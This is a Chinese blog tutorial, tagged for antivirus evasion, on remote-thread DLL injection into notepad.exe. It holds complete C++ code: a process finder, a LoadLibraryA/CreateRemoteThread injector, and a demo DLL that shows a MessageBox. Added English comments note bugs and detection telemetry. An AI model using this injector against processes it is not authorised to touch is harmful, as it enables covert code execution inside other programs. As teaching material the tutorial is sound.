
远程线程注入

左手梦圆 2022-05-04 阅读 39
c++免杀

远程线程注入

远程线程注入是最基础的一种注入方式,因为其调用了CreateRemoteThread()函数而得名。但也正因为它是最基础的注入方式,直接调用的这几个Windows API特征非常明显,所以很容易被检测出来。

这次的实验对象是notepad.exe

#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>
#include <iostream>
using namespace std;

// Injects the DLL at pszDllFileName into the process dwProcessId by starting a
// remote thread at LoadLibraryA (defined further down). Returns FALSE on any
// API failure.
BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId, char* pszDllFileName);
// Returns the PID of the first process whose image name matches process_name
// (case-insensitive), or 0 when no such process exists (defined further down).
DWORD find_process(char* process_name);

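// Entry point: locate the target process by image name and inject the demo DLL.
// Exit status is 0 on success and 1 when the target process is not running.
int main() {
    // String literals are const; binding them to a plain char* is ill-formed
    // since C++11 (MSVC only accepts it as an extension). Writable arrays keep
    // the existing char* signatures of the two helpers working unchanged.
    char dllPath[] = "C:\\Users\\w\\source\\repos\\QuickDll\\x64\\Debug\\QuickDll.dll";
    char process[] = "notepad.exe";

    DWORD process_id = find_process(process);
    if (process_id == 0) {
        // Stop here: the original went on to call the injector with PID 0,
        // which can only fail (or act on the wrong process).
        printf("%s not found\n", process);
        return 1;
    }
    // GetLastError()/th32ProcessID are DWORDs, so print them with %lu.
    printf("%s process_id is %lu\n", process, process_id);

    BOOL b = CreateRemoteThreadInjectDll(process_id, dllPath);
    cout << b;

    return 0;
}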

首先是一个大致的框架,下面就一个一个讲解

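// Returns the PID of the first running process whose image name equals
// process_name (case-insensitive), or 0 when none matches or the snapshot
// cannot be taken. If several instances run, the first one enumerated wins.
DWORD find_process(char* process_name) {

    // Snapshot of all processes at this instant. The snapshot is a kernel
    // handle and has to be closed on every exit path.
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        // The original never checked this and would have passed the invalid
        // handle to Process32First and CloseHandle.
        printf("Error CreateToolhelp32Snapshot,%lu\n", GetLastError());
        return 0;
    }

    PROCESSENTRY32 process_entry;
    process_entry.dwSize = sizeof(PROCESSENTRY32);

    DWORD found_pid = 0;
    // Process32First already fills in the first entry; the original loop
    // discarded it and only looked at Process32Next results. That entry is
    // normally "[System Process]" (PID 0), so the miss was harmless, but the
    // loop now walks every entry.
    for (BOOL more = Process32First(snapshot, &process_entry);
         more == TRUE;
         more = Process32Next(snapshot, &process_entry)) {
        if (stricmp(process_entry.szExeFile, process_name) == 0) {
            // The original streamed *szExeFile, i.e. only the first character.
            cout << "process_entry.szExeFile is" << process_entry.szExeFile << endl;
            found_pid = process_entry.th32ProcessID;
            break;
        }
    }

    CloseHandle(snapshot);
    return found_pid;
}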

首先最先用到的是find_process(char* process_name)函数,因为我们是要把我们写好的DLL注入到远程线程里。所以要先找到进程❗注意是进程不是线程哦。

CreateToolhelp32Snapshot函数会保存当时进程的快照

剩下的应该没啥好说的了,可读性还是蛮好的,就是记得关闭句柄CloseHandle(snapshot)。

接下来就是注入了

// Classic LoadLibrary-based DLL injection: the DLL path is copied into the
// target's address space and a remote thread is started at
// kernel32!LoadLibraryA with that path as its argument. Every step is a
// cross-process operation that appears in standard host telemetry (for
// example Sysmon Event ID 8 records the CreateRemoteThread call with its
// start address and module), which is why the article itself calls this
// variant easy to detect.
//
// @param dwProcessId     PID of the target process.
// @param pszDllFileName  NUL-terminated narrow path to the DLL; LoadLibraryA
//                        resolves it in the target's context, so the target
//                        must be able to open that path.
// @return TRUE once the remote thread has been created; FALSE on any API
//         failure (the failing call and GetLastError() are printed).
//
// Review notes (code intentionally left unchanged):
//  - hProcess is only closed on the success path; the four error returns
//    after OpenProcess leak it.
//  - hRemoteThread is never closed or waited on, and the remote buffer from
//    VirtualAllocEx is never released with VirtualFreeEx.
//  - GetLastError() returns a DWORD; "%d" should be "%lu".
//  - The narrow "kernel32.dll" literal assumes a non-UNICODE build of
//    GetModuleHandle.
BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId,char* pszDllFileName) {
    HANDLE hProcess = NULL;
    SIZE_T dwSize = 0;
    LPVOID pDllAddr = NULL;
    FARPROC pFuncProcAddr = NULL;

    // Open the target process.
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    if (NULL == hProcess) {
        printf("Error OpenProcess,%d", GetLastError());
        return FALSE;
    }

    // Reserve and commit memory in the target for the path string.
    dwSize = 1 + strlen(pszDllFileName);   // include the terminating NUL
    pDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
    if (pDllAddr == NULL) {
        printf("Error VirtualAllocEx,%d", GetLastError());
        return FALSE;
    }

    // Copy the DLL path into the allocated buffer.
    if (FALSE == WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL)) {
        printf("Error WriteProcessMemory,%d", GetLastError());
        return FALSE;
    }

    // Resolve LoadLibraryA locally; kernel32 is mapped at the same base in
    // every process of the same session, so the address is valid remotely.
    pFuncProcAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    if (NULL == pFuncProcAddr) {
        printf("Error GetProcAddress,%d", GetLastError());
        return FALSE;
    }

    // Start a thread in the target that runs LoadLibraryA(pDllAddr).
    // (C-style cast of FARPROC to LPTHREAD_START_ROUTINE: the signatures
    // differ, which is tolerated on Win32 but is not portable C++.)
    HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, NULL);
    if (NULL == hRemoteThread) {
        printf("Error CreateRemoteThread,%d", GetLastError());
        return FALSE;
    }

    CloseHandle(hProcess);
    return TRUE;
}

这段代码可读性太好了,以至于我实在不知道该怎么讲,就把各个可能不熟悉的API文档放进来吧:

  • OpenProcess | Microsoft Docs
  • VirtualAllocEx | Microsoft Docs
  • WriteProcessMemory | Microsoft Docs
  • GetProcAddress | Microsoft Docs
  • CreateRemoteThread function (processthreadsapi.h) - Win32 apps | Microsoft Docs

然后DLL也是非常的简单

#include "pch.h"

// Exported with C linkage so the symbol name is not mangled (see the note at
// the end of the article).
extern "C" __declspec(dllexport) void HelloWorld();

//核心入口函数 DLL入口函数 
// DLL entry point. The only reason this DLL does anything is the
// DLL_PROCESS_ATTACH branch, which runs HelloWorld() as soon as the loader
// maps the module into the host process.
//
// NOTE(review): HelloWorld() shows a MessageBox from inside DllMain, i.e.
// while the loader lock is held. Microsoft's DllMain rules allow only trivial
// initialisation there (no UI, no loading further DLLs, no waiting on other
// threads); it usually works in a demo but can deadlock or misbehave.
// hModule and lpReserved are unused.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:  // the DLL was just mapped into the process
        HelloWorld();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;   // returning FALSE on PROCESS_ATTACH would unload the DLL
}

// Demo payload: shows a blocking Yes/No box in the host process. The button
// the user picks is irrelevant here, so the result is discarded explicitly.
void HelloWorld()
{
    const int choice = MessageBox(nullptr, "Success", "Message", MB_YESNO);
    static_cast<void>(choice);
}

稍微能讲一讲的就只有extern "C" __declspec(dllexport) void HelloWorld();

这是通过C的方式编译,因为通过C++ 编译出来的函数名有点奇怪。但是跟本篇又没啥关系。感兴趣的话自行百度扩展一下吧。
